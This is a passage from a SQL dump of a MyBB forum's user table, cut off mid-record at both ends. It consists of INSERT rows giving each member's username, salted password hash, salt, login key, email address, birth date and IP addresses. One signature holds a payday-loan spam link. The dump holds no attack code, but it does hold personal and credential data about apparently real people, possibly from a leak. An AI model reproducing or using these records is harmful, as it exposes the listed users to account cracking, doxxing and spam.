'nb_ed143@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351798564', '1352518062', '1352300521', '0', '', '0', '', '', '', '2-9-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '112.210.42.136', '112.210.100.164', '1892821640', '1892836516', '', '214', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('310', 'amir12011', '01ddfb3f144d754a2c12f90b2d61f63f', '3zxHhosp', 'TSwb8VBS6xt8JQn7obj2kiV2lHWE7LrEOgM6hikpZNnUtVTyY7', 'youyou102@hotmail.fr', '0', '', '', '', '2', '', '0', '', '1351789824', '1351894538', '1351892894', '0', '', '0', '', '', '', '4-1-1990', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '257', '0', '0', '41.104.91.124', '41.104.87.48', '694705020', '694703920', '', '7760', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('312', 'rayane888', 'bb27415ca8512769084318173bcae262', 'j3nhFliJ', 'CU6irbop5C57VmtI9psAR1LwT8rEdLQNflTFUSmbY5mwveUCuj', 'rayane424888@gmail.com', '0', '', '', '', '2', '', '0', '', '1351804547', '1351965282', '1351808284', '0', '', '0', '', '', '', '9-11-1989', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '41.200.51.232', '41.200.43.51', '700986344', '700984115', '', '2277', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('313', 'LSD', '0f91f08bba1edab5ac45fbb5f1d60ddc', '6dmFziBI', 'mdjKKJ8GT4WQu3RRJZL2kJfjzrxK76cP2nTdeqMhKrw8qldn1O', 'officialpyrox@gmail.com', '1', '', '', '', '2', '', '0', '', '1351876325', '1351877109', '1351876325', '1351876624', '', '0', '', '', '', '10-4-1997', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '257', '0', '3', '69.125.203.115', '69.125.203.115', '1165871987', '1165871987', '', '784', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('314', 'JesseH1980', '9ef3beed8254b1d9b5b225200e0d5f84', 'b4oPgGTS', 'wtlFRAcH4XmuwGZQnNfPWTrIVSJUnlUkzjKulU82eipQMpyoWI', 'Estherhfj4040@yahoo.com', '0', '', '', '', '2', '', '0', '', '1351879481', '1352006222', '1351879481', '0', 'http://communities.bentley.com/members/jenamejia1970/default.aspx', '0', '', '', '', '23-4-1955', 'all', '[url=http://politics4all.com/users/ClaytonCooke1990/blog/47179-actual-payday-loan-lenders-fast-cash-loans-loans-to-solve-your-emergent-needs]cash advance in 1 hour[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.103.197', '129.121.101.56', '-2122750011', '-2122750664', '', '7', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('315', 'kanep', '94591be0b96e38ea72f469adf45e4107', 'E8HZrZO1', 'e58UEIQHawjNtLvBMObltvdLyziL5Q6XRoy7qF545hnsfHJi3I', 'nilszzz@hotmail.com', '0', '', '', '', '2', '', '0', '', '1351936748', '1351937610', '1351936748', '0', '', '0', '', '', '', '30-6-1994', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '194.150.65.31', '194.150.65.31', '-1030340321', '-1030340321', '', '862', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('318', 'CrayCrayManiac', '54fbc0521d499ba83109576beb83f02c', '9UDsUMRr', 'KH88KJEnHnLIpB5Em2CxJZNYiEufVY7yzhXJTEbisqvhbi4mjZ', 'craycraymaniac@gmail.com', '0', '', '', '', '2', '', '0', '', '1351983326', '1351985775', '1351983326', '0', '', '0', '', '', '', '17-12-1982', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '174.31.250.155', '174.31.250.155', '-1373635941', '-1373635941', '', '2471', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('319', 'xcore03', 'c73c77da1d13e80c5bd9424163136a3c', 'vbjVufWw', 'cuV6HNdUpCIcN4Y78tN61IhzEzFOqjEIoLiAnfilKhuEEf4N9U', 'xcore@spamhereplease.com', '0', '', '', '', '2', '', '0', '', '1352018641', '1352201191', '1352040537', '0', '', '0', '', '', '', '25-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '223', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '121.54.47.52', '173.0.11.244', '2033594164', '-1392505868', '', '3392', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('320', 'Lordsimo', 'f91f2e894243f6afe24213c6a607f411', 'hERBCo8R', 'BckUA1crnYs7hm9tBJjk1lkMuYfXP1xl8SWxtnSVjUxd7gAr7U', 'Lordsimo@gmail.com', '0', '', '', '', '2', '', '0', '', '1352034577', '1352034824', '1352034577', '0', '', '0', '', '', '', '4-1-1984', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '79.24.200.253', '79.24.200.253', '1327024381', '1327024381', '', '247', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('321', 'tmac30', '753c4aef2b83f95f1297ee1d3fb95421', 'QZvwO1et', 'Ay4LBDnjyzOqAOu8pGhgZv3D4ivWhKU9SBrSSJAgKqKiIJOOrd', 'rjackson123451@gmail.com', '0', '', '', '', '2', '', '0', '', '1352125390', '1352127957', '1352125940', '0', '', '0', '', '', '', '23-12-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '24.191.244.156', '24.191.244.156', '415233180', '415233180', '', '993', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('322', 'BaneKitty (LEGIT)', '3acd5cfeade332417f932148726c3d14', 'FEtQQFu5', 'gV8RqVVM5df5ks5BpsBVbIOh7RdUSNdmIo48RYKnhfMUrkZqPA', 'fiestyambermartin@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352132581', '1352132581', '1352132581', '0', '', '0', '', '', '', '5-10-1988', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '174.60.173.69', '', '-1371755195', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('323', 'moruzaks', 'e007f7d2c782c28b2f431f8bb7d4edaa', 'mziHEeWv', '7OyO9N5Ey4oXaZ6iT8DkPzYqEPbV34dCyqQGFRMLBpDWFRthyR', 'moruzaks@gmail.com', '3', '', '', '', '2', '', '0', '', '1352159268', '1352479043', '1352170309', '1352476992', '', '0', '', '', '', '24-10-1987', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '196.46.245.49', '216.119.145.99', '-1003555535', '-663252637', '', '12167', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('324', 'Purps™', '7b84cff44ed1ba5b7bb0962e95812e61', '6PEO1dlw', 'PPdbmvLC9mb8n3F8vi4ZOITPVAoayOBSl5r6vr9YRKcIiXEB8J', 'purpstm@gmail.com', '4', '', '', '', '2', '', '0', '', '1352172222', '1352747822', '1352708941', '1352265009', '', '0', '', '', '', '20-4-1990', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '0', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '67.181.154.90', '67.181.154.90', '1135975002', '1135975002', '', '1957', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('325', 'Perfection', 'ecccc16250c5260fbc9aa6ba9e76299d', 'iMqLMtQb', 'anqvxvBuIPO4TxuqsZKpiCHX64jRC266CluxH8XiRTFeBQiVPJ', 'kenneth-huynh@hotmail.com', '4', '', '', '', '2', '', '0', '', '1352177143', '1352763240', '1352684774', '1352296702', '', '0', '', '', '', '16-7-1995', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '107.204.89.253', '108.254.243.128', '1808554493', '1828647808', 'english', '4258', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('327', 'dublejayj', 'c41c50a083571bd30b8a08569e6489c0', 'Iz8WlqIK', '3JoVnPRkS54VxkDQvjCPv5WkHs2lHDvvtjmYRqjAOjDyafthMt', 'randomninjaman@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352245900', '1352246107', '1352245900', '0', '', '0', '', '', '', '10-6-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '1', '', '', '0', '0', '0', '0', '', '', '', '82', '0', '0', '72.95.249.219', '72.95.249.219', '1214249435', '1214249435', 'english', '207', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('329', 'Weeknd', 'a718ccebce94ae2005adeb4c154c798c', 'ir7RvWcd', '23lFSslaAuKx9iPObtUGJQzOa9xAaW1ait16VUcFhwsCcdVdEz', 'o.c.o.b.r.a@aol.com', '0', '', '', '', '2', '', '0', '', '1352371108', '1352377741', '1352372172', '0', '', '0', '', '', '', '3-3-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', 